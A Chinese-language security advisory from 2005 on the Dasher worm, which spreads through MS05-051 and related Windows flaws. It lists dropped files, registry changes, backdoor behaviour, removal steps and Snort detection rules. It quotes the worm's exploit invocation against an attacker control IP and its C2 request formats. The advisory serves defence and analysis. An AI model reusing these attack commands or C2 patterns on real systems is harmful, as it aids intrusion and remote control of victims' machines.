xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
Xcon English Version

Net-Worm.Win32.Dasher(黛蛇)蠕虫公告


创建时间:2005-12-20 更新时间:2005-12-21
文章属性:原创
文章提交:killer (killer_at_uid0.net)

Net-Worm.Win32.Dasher(黛蛇)蠕虫公告



Author: killer (killer<2>xfocus.org)
Date:2005-12-20


    近日,一种以利用MS05-051漏洞的新型的蠕虫爆发,该蠕虫在几天内迅速出现多个变种,新变种除了利用MS05-051外,还利用MS04-045、MS05-039、MSSQL-Hello等漏洞传播,威胁到Windows 2000、Windows XP、Windows 2003等系统。

    病毒文件主要分为两部分,一部分为病毒的扫描、溢出部分,一部分是攻击者进行远程控制。

一、扫描:

    蠕虫体在运行后会释放出来如下文件:
    
    %System%\wins\Result.txt    结果文件
    %System%\wins\SqlExp.exe    Exploit.Win32.MS04-045.k    
    %System%\wins\SqlExp1.exe    Exploit.Win32.MS05-039.ac
    %System%\wins\SqlExp2.exe    Exploit.Win32.MS05-051.d    
    %System%\wins\SqlExp3.exe    Exploit.Win32.MSSQL-Hello.a    
    %System%\wins\SqlScan.exe    NetTool.Win32.TCPPortScanner
    %System%\wins\Sqltob.exe    Net-Worm.Win32.Dasher.b
    
    同目录下还可能存在42.txt、445.txt、1025.txt、1433.txt等遗留文件。


其中.b变种的sqltob.exe蠕虫体主文件:

    [文件信息]
    Size: 0x2420 (9248)
    MD5:53BAE5B6B6CD8794B05DF2B99B4128BA
    PE Appended: at 0x2264 (8804), size 0x1BC (444)
    Compiler:LCC Win32
    
    sqltob.exe协调扫描和攻击,攻击采用格式如下:SqlExp.exe -r 222.240.219.143 -p 53 -o 0 -t ip
    其中222.240.219.143为“黑客”的控制IP。
    
    1、蠕虫修改注册表,增加如下键:
    
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
    
    键名:SMBDeviceEnabled
    键值:dword:00000000
    
    2、修改如下键:
    
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDTC
    键名:Start    
    修改为:dword:00000004
    
二、控制:

    此组合蠕虫采用如下后门文件控制目标系统:
    
    %ProgramFiles%\nzspfrwy.log    keylog文件
    %ProgramFiles%\nzspfrwy.dll    Backdoor.Win32.PcClient.ij
    %ProgramFiles%\nzspfrwy.dl1    Backdoor.Win32.PcClient.hp
    %ProgramFiles%\nzspfrwy.sys    Backdoor.Win32.PcClient.ij
    
    其中nzspfrwy.sys驱动HOOK系统SSDT来隐藏nzspfrwy*文件。第一次运行将nzspfrwy.dll插入到svchost进程,并启动一个隐藏的IE进程与远程主机通信。连接域名free???-???.cn/zyangel和DNS??.3322.org域名,前者域名可以下载sdbot相关文件,后者将接受控制者控制。(?为屏蔽的字母)

    1、修改如下键:
       HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
       键名:ServiceDll
       修改为:%ProgramFiles%\nzspfrwy.dll
    
     2、增加如下服务:
        服务名称:nzspfrwy  
        显示名称:nzspfrwy  
        执行文件路径:C:\Program Files\nzspfrwy.sys
    
    3、采用如下方式与控制者通讯:
        PUT /upjpg.asp?501361070000F0FD010026*
        GET /index.asp?500261070000F0FD010026*

三、清除办法:(以WIN2000 PRO版为例)

    1、任务管理器结束:Sqltob.exe、SqlScan.exe进程。
    2、删除%System%\wins下对应文件。
    3、修改注册表键停止内核驱动:
    
       从如下地址下载IceSword运行:http://www.xfocus.net/tools/200506/1051.html
      
       定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nzspfrwy
       修改Startdword值为4,重启动系统。
      
    4、重启动后,会在任务管理器中看到没有被隐藏的IE进程,该进程无法用任务管理器结束,可以用ntsd -cq -p pid 结束。
       删除%ProgramFiles%\对应的病毒文件。
    
    5、删除残余服务表项:
       SC delete nzspfrwy
       用注册表编辑器删除此键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NZSPFRWY
      
    6、恢复HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters表项:
            键名:ServiceDll
            病毒键值:%ProgramFiles%\nzspfrwy.dll
            恢复为:%SystemRoot%\system32\rpcss.dll
      
    7、升级系统补丁。
    
    8、在防火墙中屏蔽如下端口:
       42
       445
       1025
       1433
          
      
四、Snort预警规则:
    
alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"EXPLOIT MS-SQL Hello Overflow Attempt"; flow:to_server,established; content:"|12 01 00 34 00 00 00 00|"; offset:0; depth:8; dsize:>570; reference:url,www.microsoft.com/technet/security/bulletin/MS02-056.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"EXPLOIT UPnP Overflow Attempt"; flow:to_server,established; content:"|ff 53 4d 42 25|"; offset:4; depth:5; content:"|5c 00 50 00 49 00 50 00 45 00 5c 00 00 00|"; offset:72; depth:14; content:"|26 00|"; offset:65; depth:2; content:"|00|"; offset:90; depth:1; content:"|36 00|"; offset:110; depth:2; content:"|90 90 90 90 90 90 90 90 90 90 90 90|"; offset:200; dsize:>1300; reference:url,www.microsoft.com/technet/security/bulletin/MS05-039.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"EXPLOIT MSDTC Overflow Attempt"; flow:to_server,established; content:"|05 00 00 83 10 00 00 00 2c 05|"; offset:0; depth:10; content:"|e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da|"; offset:24; depth:16; content:"|cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00|"; offset:208; dsize:1024; reference:url,www.microsoft.com/technet/security/bulletin/MS05-051.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 42 (msg:"EXPLOIT WINS Overflow Attempt"; flow:to_server,established; byte_test:1,&,64,6; byte_test:1,&,32,6; byte_test:1,&,16,6; byte_test:1,&,8,6; pcre:!"/^.{8}(\x05\x37(\x1E[\x90-\xFF]|[\x1F-\x2F].|\x30[\x00-\x70])|\x00\x00\x00[\x00-\x65]|\x02\x68\x05\xC0)/s"; reference:bugtraq,11763; reference:cve,2004-1080; reference:url,www.immunitysec.com/downloads/instantanea.pdf; reference:url,www.microsoft.com/technet/security/bulletin/MS04-045.mspx; classtype:misc-attack; sid:3017; rev:6;)


    Creditz: Stardust帮忙修改Snort规则,及xfocus的兄弟们和安天实验室Cert小组。